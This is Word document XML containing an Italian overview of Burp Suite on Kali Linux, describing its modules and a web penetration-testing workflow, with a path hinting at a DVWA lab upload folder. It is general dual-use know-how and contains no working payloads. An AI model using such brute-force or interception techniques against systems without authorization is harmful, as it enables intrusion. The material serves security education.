    <w:p w14:paraId="0F91DB64" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kali Linux, come sistema operativo orientato alla sicurezza, include </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite in versione Community di default. Questa versione offre le funzioni base del software, che sono comunque sufficienti per la maggior parte delle necessità dei principianti o per semplici audit di sicurezza. Per funzionalità avanzate, come il rilevamento automatizzato di vulnerabilità, è disponibile la versione **Professional** di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite, la quale è a pagamento e può essere installata manualmente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699A49F7" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F14833D" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Componenti Principali di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FB9453" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E7613D6" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite è suddiviso in vari moduli, ciascuno con funzionalità specifiche:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E3D0DB" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>1. **Proxy**: Questo modulo permette di intercettare e manipolare il traffico HTTP tra il browser e l'applicazione web. Attraverso il proxy, è possibile modificare richieste e risposte per osservare e testare il comportamento dell'applicazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D052C7" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B046161" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. **Spider**: Lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>spidering</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> è una tecnica di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crawling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per mappare l'intera struttura dell'applicazione web, identificando tutte le pagine e le funzionalità. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite Spider è usato per automatizzare la navigazione e creare una mappa del sito, utile per i test di sicurezza completi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32188BD9" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72B9D3DA" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>3. **Scanner** (disponibile solo nella versione Pro): Questo modulo automatizza la scansione dell'applicazione per rilevare vulnerabilità comuni come XSS, SQL injection, e altri errori di configurazione. È una delle funzioni più potenti e utilizzate per audit su larga scala.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E015219" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B76551" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>4. **Intruder**: Intruder è uno strumento avanzato che permette di fare attacchi di forza bruta e automazione di payload personalizzati per identificare debolezze di sicurezza. È particolarmente utile per test di autenticazione, enumerazione di parametri e brute force.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB6C544" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47BAB0D2" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>5. **</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">**: Con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, l’utente può inviare manualmente richieste HTTP e osservare le risposte dell'applicazione. È particolarmente utile per analizzare richieste specifiche e verificare il comportamento dell’applicazione in risposta a input variabili.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601E5070" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0600C4F6" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>6. **</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sequencer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">**: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sequencer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> è utilizzato per testare l’affidabilità e la casualità dei token di sessione. Questo modulo è essenziale per verificare la sicurezza dei meccanismi di gestione delle sessioni, valutando se i token di sessione o altri ID sono realmente casuali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6690D6E6" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D9124F9" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. **Decoder**: Questo strumento consente di codificare o decodificare dati in vari formati, come base64, URL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, e altro. È utile quando si lavora con dati cifrati o codificati durante un test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2444421F" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A954AF" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>8. **</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Comparer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">**: Con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Comparer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> è possibile confrontare facilmente due set di dati, come richieste o risposte, per evidenziare differenze. È spesso usato per analizzare modifiche minori nei dati dell’applicazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2022AAF9" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E89EF91" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6948660C" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D05CD6C" w14:textId="1CB866B1" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">**Flusso di Lavoro di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite per un Test di Sicurezza**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A6A691" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E50C5BF" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. **Configurazione del Proxy**: Configurare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite come proxy permette di intercettare e analizzare il traffico HTTP. È comune usare un browser come Firefox configurato per passare attraverso </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite per questo scopo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBEE54A" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056F0481" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. **Mapping e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spidering</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">**: Si usa il modulo di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spidering</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per mappare l'applicazione. È importante raccogliere informazioni sul sito per capire la struttura e la portata delle funzionalità.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0C7A52" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CBD4AC4" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>3. **Scansione per Vulnerabilità**: Utilizzando il modulo Scanner (se disponibile), si possono rilevare automaticamente vulnerabilità comuni. Questo modulo può identificare punti deboli come SQL injection, XSS e altri problemi di configurazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EA3D23" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19382BFA" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. **Analisi Manuale con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e Intruder**: Dopo aver identificato potenziali vulnerabilità, l'analisi manuale è fondamentale. Intruder è usato per attacchi di forza bruta o test di parametri specifici, mentre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> consente di inviare richieste personalizzate per osservare le risposte dell'applicazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFBDB82" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B20BADB" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. **Verifica della Gestione delle Sessioni con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sequencer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">**: Il modulo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sequencer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> può essere utilizzato per testare l'affidabilità della gestione delle sessioni e la randomizzazione dei token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AD38FA" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D6FAB5C" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>**Conclusione**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300DA869" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1702A2A2" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite rappresenta un’ottima risorsa per chi lavora in cyber security su Kali Linux. Le funzionalità che offre permettono di eseguire test di sicurezza completi e approfonditi sulle applicazioni web. Sebbene la versione Community di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite sia limitata in alcune aree, rimane comunque sufficiente per compiti basilari di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Per test di sicurezza avanzati e automatizzati, la versione Professional è preferibile e fornisce una gamma più completa di funzionalità.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25D633" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542AEEF2" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236BDA3D" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="559748F4" w14:textId="0E1DAC68" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Raccomandazioni**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D69E18" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F7BD64F" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Utilizzare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite sempre in ambienti controllati e con autorizzazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD97B7F" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>- Se si è principianti, familiarizzare con ciascuno dei moduli per comprenderne l’efficacia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E63BF6F" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>- Considerare la versione Professional per un’esperienza più avanzata e con capacità di scansione automatica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B3C863" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04ADFBBD" w14:textId="731B473E" w:rsidR="00C142AA" w:rsidRPr="00534455" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite, in conclusione, è uno degli strumenti essenziali per l'analisi della sicurezza delle applicazioni web e rappresenta un elemento fondamentale nel toolkit di un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>penetration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tester su Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C142AA" w:rsidRPr="0053445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00528"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5FCEE7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AA16E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC642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2132733">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1054278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178"/>
    <w:rsid w:val="002E0C2F"/>
    <w:rsid w:val="00345584"/>
    <w:rsid w:val="004D732A"/>
    <w:rsid w:val="004F0178"/>
    <w:rsid w:val="00534455"/>
    <w:rsid w:val="006C2D47"/>
    <w:rsid w:val="00BB265C"/>
    <w:rsid w:val="00C142AA"/>
    <w:rsid w:val="00F334B5"/>
    <w:rsid w:val="00FA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FB31D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4D922178-422E-4F44-B104-BE4041994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4558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F334B5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334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3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45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1.109/dvwa/hackable/uploads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7</Pages>
  <Words>1076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De Angelis</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sara De Angelis</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-04T14:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-04T16:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>